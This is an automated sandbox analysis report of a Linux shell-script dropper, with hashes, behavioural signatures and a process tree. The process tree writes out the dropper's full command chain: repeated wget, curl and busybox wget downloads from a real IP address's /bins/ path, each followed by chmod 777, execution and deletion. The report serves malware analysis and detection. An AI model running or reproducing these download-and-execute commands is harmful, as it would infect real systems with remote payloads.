Analysis
-
max time kernel
70s -
max time network
113s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
-
Size
10KB
-
MD5
3aaf11d0f07a6e2ac3ecd444e17b7264
-
SHA1
20aa3c7e07680e3c4c69d8f73bb7b0c6907720dd
-
SHA256
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea
-
SHA512
d017e3552474bf26ac8e1ee45c9b4122fa7943f4d4e234071da4a28d2a874653c9d1461ffc5152af8c0d3e923f8074ed0f8b165d934f68c4eb7df0dd2e45a65e
-
SSDEEP
192:VLV2KcsxV/G+N6GA5uKgqcl2KcixVTG+N6GQM:NV2Kcz5uKgqM2Kc3M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 736 chmod 750 chmod 801 chmod 870 chmod 882 chmod 793 chmod 832 chmod 846 chmod 858 chmod 896 chmod 710 chmod 722 chmod 765 chmod 864 chmod 890 chmod 914 chmod 928 chmod 934 chmod 954 chmod 697 chmod 818 chmod 876 chmod 922 chmod 940 chmod 947 chmod 785 chmod 902 chmod 908 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 698 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 711 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 723 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 737 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 751 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 766 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 786 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 794 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 802 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 819 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 833 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 847 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 859 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 865 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 871 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 877 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 883 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 891 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 897 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 903 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 909 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 915 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 923 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 929 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 935 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 941 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 949 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 955 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl
Processes
-
/tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh/tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh1⤵PID:671
-
/bin/rm/bin/rm bins.sh2⤵PID:674
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:678
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:686
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:694
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:698
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:699
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:701
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:705
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:709
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:711
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:713
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:714
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:715
-
-
/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:723
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:724
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:733
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:747
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:761
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:768
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:769
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:782
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:787
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:789
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:792
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:798
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:812
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:820
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:829
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:835
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:843
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:848
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:849
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:857
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:863
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:869
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:875
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:879
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:881
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:889
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:895
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:896
-
-
